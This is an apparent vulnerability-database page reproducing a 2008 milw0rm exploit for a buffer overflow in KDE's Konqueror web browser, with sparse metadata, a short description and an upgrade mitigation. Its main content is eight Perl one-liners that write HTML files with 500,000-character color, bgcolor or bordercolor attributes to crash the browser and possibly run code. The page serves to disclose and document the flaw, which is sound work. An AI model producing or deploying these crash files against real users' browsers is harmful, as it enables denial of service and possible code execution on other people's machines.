KDE's Konqueror & Color Attribute Love

vendor:

Konqueror web browser

by:

milw0rm.com

8.8

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Konqueror web browser

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

KDE’s Konqueror & Color Attribute Love

KDE's Konqueror web browser is vulnerable to a buffer overflow when processing HTML documents with overly long color attributes. This can be exploited to cause a denial of service or potentially execute arbitrary code.

Mitigation:

Upgrade to the latest version of KDE's Konqueror web browser.

Source

Exploit-DB raw data:

KDE's Konqueror & Color Attribute Love

perl -e 'print "<html>\n" . "<font color=" . "A" x 500000 . ">\n</html>"' > kdie.html
perl -e 'print "<html>\n" . "<hr color=" . "A" x 500000 . ">\n</html>"' > kdie2.html
perl -e 'print "<html>\n" . "<table bgcolor=" . "A" x 500000 . ">\n</html>"' > kdie3.html
perl -e 'print "<html>\n" . "<table bordercolor=" . "A" x 500000 . ">\n</html>"' > kdie4.html
perl -e 'print "<html>\n" . "<td bgcolor=" . "A" x 500000 . ">\n</html>"' > kdie5.html
perl -e 'print "<html>\n" . "<td bordercolor=" . "A" x 500000 . ">\n</html>"' > kdie6.html
perl -e 'print "<html>\n" . "<tr bgcolor=" . "A" x 500000 . ">\n</html>"' > kdie7.html
perl -e 'print "<html>\n" . "<tr bordercolor=" . "A" x 500000 . ">\n</html>"' > kdie8.html

# milw0rm.com [2008-10-08]